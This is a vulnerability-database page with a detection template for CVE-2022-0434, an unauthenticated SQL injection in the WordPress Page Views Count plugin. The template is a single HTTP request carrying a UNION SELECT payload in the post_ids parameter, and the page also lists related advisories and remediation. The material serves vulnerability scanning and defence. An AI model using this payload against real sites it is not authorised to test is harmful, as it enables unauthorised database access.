| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2022-0434 | 7 Mar 202209:15 | – | attackerkb | |
| CVE-2022-0434 | 8 Jul 202521:02 | – | circl | |
| WordPress plugin Page View Count SQL注入漏洞 | 7 Mar 202200:00 | – | cnnvd | |
| CVE-2022-0434 | 7 Mar 202208:16 | – | cve | |
| CVE-2022-0434 Page Views Count < 2.4.15 - Unauthenticated SQL Injection | 7 Mar 202208:16 | – | cvelist | |
| CVE-2022-0434 | 7 Mar 202209:15 | – | nvd | |
| CVE-2022-0434 | 7 Mar 202209:15 | – | osv | |
| WordPress Page View Count plugin <= 2.4.14 - Unauthenticated SQL Injection (SQLi) vulnerability | 1 Feb 202200:00 | – | patchstack | |
| Sql injection | 7 Mar 202209:15 | – | prion | |
| CVE-2022-0434 | 9 Jan 202610:45 | – | redhatcve |
id: CVE-2022-0434
info:
name: WordPress Page Views Count <2.4.15 - SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability. It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
remediation: |
Update to the latest version of the WordPress Page Views Count plugin (2.4.15) to mitigate the SQL Injection vulnerability.
reference:
- https://wpscan.com/vulnerability/be895016-7365-4ce4-a54f-f36d0ef2d6f1
- https://wordpress.org/plugins/page-views-count/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0434
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0434
cwe-id: CWE-89
epss-score: 0.14783
epss-percentile: 0.96271
cpe: cpe:2.3:a:a3rev:page_view_count:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: a3rev
product: page_view_count
framework: wordpress
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,unauth,a3rev,vkev,vuln
variables:
num: "999999999"
http:
- raw:
- |
GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
- type: status
status:
- 200
# digest: 490a00463044022052d2f8c5263a647c98082a593b1c89ff41a4f8732e90a1c91ba8f8b16ffefaf7022073791243686ce2f5188d6d58278ae98459fe40a1392977ba2584b5a29715f2b0:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation